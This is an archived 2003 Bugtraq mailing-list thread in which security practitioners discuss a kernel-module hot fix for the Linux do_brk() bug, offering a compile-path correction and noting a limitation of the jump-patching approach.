Kommentar i text 11077131 av <canon@nersc.gov>
11076067 2003-12-09 19:24 +0100 /42 rader/ Mariusz Woloszyn <emsi@ipartners.pl>
Importerad: 2003-12-09 20:39 av Brevbäraren
Extern mottagare: =?ISO-8859-2?Q?Pavel_harry=5Fx_Pal=E1t?= <harry_x@babylon5.cz>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30251>
Kommentar till text 11070717 av =?ISO-8859-2?Q?Pavel_harry=5Fx_Pal=E1t?= <harry_x@babylon5.cz>
Ärende: Re: Hot fix for do_brk bug
------------------------------------------------------------
From: Mariusz Woloszyn <emsi@ipartners.pl>
To: =?ISO-8859-2?Q?Pavel_harry=5Fx_Pal=E1t?= <harry_x@babylon5.cz>
Cc: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.58.0312091918190.30123@dzyngiel.ipartners.pl>
On Sat, 6 Dec 2003, Pavel harry_x Palát wrote:
> > It would be less intrusive to the kernel to supply a fixed do_brk()
> > and replace the do_brk with a jump to your version.
>
> I've written similar patch few days ago. The patch only modifies first
> instructions of do_brk() (it replaces them with jmp to function in LKM.
> It can be downloaded from http://wizard.ath.cx/fixbrk.tar.gz
>
> But beware, I wrote it in rush and it's pretty odly written :-) But it
> worked on my two servers (both were running 2.4.21 kernel with grsecurity
> patch).
>
Sometimes it might be valuable to patch your fixbrk.pl.
Your version does:
system("gcc -D__KERNEL__ -DMODULE -c -o _fixbrk.o fixbrk.c");
On some hosts, to compile this module you need to specify the path to
kernel header files. For example:
system("gcc -D__KERNEL__ -DMODULE -I/usr/src/linux/include -c -o
_fixbrk.o fixbrk.c");
Otherwise you might end up with something like:
/usr/include/asm/processor.h:56: error: `CONFIG_X86_L1_CACHE_SHIFT' undeclared here (not in a function)
Regards,
--
Mariusz Wo³oszyn
Internet Security Specialist, GTS - Internet Partners
(11076067) /Mariusz Woloszyn <emsi@ipartners.pl>/(Ombruten)
11077131 2003-12-09 11:59 -0800 /59 rader/ <canon@nersc.gov>
Importerad: 2003-12-10 01:56 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30258>
Kommentar till text 11070717 av =?ISO-8859-2?Q?Pavel_harry=5Fx_Pal=E1t?= <harry_x@babylon5.cz>
Ärende: Re: Hot fix for do_brk bug
------------------------------------------------------------
From: canon@nersc.gov
To: bugtraq@securityfocus.com
Message-ID: <200312091959.hB9JxiOr006857@pookie.nersc.gov>
I had a similar approach working, but was still tweaking the
implementation. You beat me to the punch. Doh! My working version
did an objdump of vmlinux to determine the opcode boundaries.
One potential flaw in this approach is the instructions that are
over-written by the jump and copied to the assembler routine (dobrk2)
can't include any operations that have relative addresses or offsets.
Fortunately, this seems quite rare from a brief scan of various
kernel routines. However, its probably worth checking the assembler
routine before issuing the module load. I still think this is a
better approach than my initial version that "fixed" calls and jumps.
Nice work.
--Shane
> > It would be less intrusive to the kernel to supply a fixed do_brk()
> > and replace the do_brk with a jump to your version.
>
> I've written similar patch few days ago. The patch only modifies first
> instructions of do_brk() (it replaces them with jmp to function in LKM.
> It can be downloaded from http://wizard.ath.cx/fixbrk.tar.gz
>
> But beware, I wrote it in rush and it's pretty odly written :-) But it
> worked on my two servers (both were running 2.4.21 kernel with grsecurity
> patch).
>
> Greetings
>
> Pavel Palát
>
> --
> Pavel "harry_x" Palát
> harry_x@babylon5.cz
> irc: #mistral.cz on IRCnet
>
> The only way of finding the limits to the possible is by going beyond them to the impossible
> Arthur C. Clark
>
------------------------------------------------------------------------
Shane Canon voice: 510-486-6981
PSDF Project Lead fax: 510-486-7520
National Energy Research Scientific
Computing Center
1 Cyclotron Road Mailstop 943-256
Berkeley, CA 94720 canon@nersc.gov
------------------------------------------------------------------------
(11077131) /<canon@nersc.gov>/------------(Ombruten)